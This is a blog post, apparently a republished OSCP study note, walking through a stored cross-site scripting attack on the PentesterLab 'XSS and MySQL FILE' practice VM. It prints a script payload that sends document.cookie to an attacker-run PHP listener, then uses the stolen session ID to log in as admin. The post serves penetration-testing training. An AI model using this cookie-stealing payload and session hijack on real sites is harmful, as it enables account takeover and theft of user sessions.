• 周四. 8月 11th, 2022

5G编程聚合网

5G时代下一个聚合的编程学习网

热门标签

OSCP Security Technology

admin

11月 28, 2021

OSCP Security Technology – Cross-Site Scripting(XSS)

Installing XSS & MySQL FILE

https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/

Exploit this VM

Find the IP address of XSS_MySQL_File virtual machine.

netdiscover

image-20210808170213888

Browse this PentesterLab vulnerable blog through Firefox.

image-20210808170400416

Click Test buttion, and find a good place to test XSS.

<script>alert('XSS')</script>

image-20210808170917477

Submit this query. Everytime fresh this website, we will see the alter .

image-20210808171107376

Create a index.php file on the root folder.

nano index.php
<?php

$cookie = isset($_GET["test"])?$_GET["test"]:"";

?>

Run the php service.

service apache2 stop
php -S 192.168.2.26:80

image-20210808172423960

Submit a new query.

<script>location.href='http://192.168.2.26/index.php?test='+document.cookie;</script>

image-20210808174455969

Then we can find the PHPSESSIONID on the backend.(a0b4od8kee0jlj9oeumjb819t3)

image-20210808174810704

Install Firefox Add-on – Cookie Quick Manager.

image-20210808175034119

Click button – Manager all Cookies.

image-20210808175210057

Edit and save the cookie value the current one which find from the backend.

image-20210808175443374

Refresh the website and click Admin button, then we can login without username and password.

image-20210808175659969

We can post a new blog now.

image-20210808175920811

相信未来 – 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。

发表评论

您的电子邮箱地址不会被公开。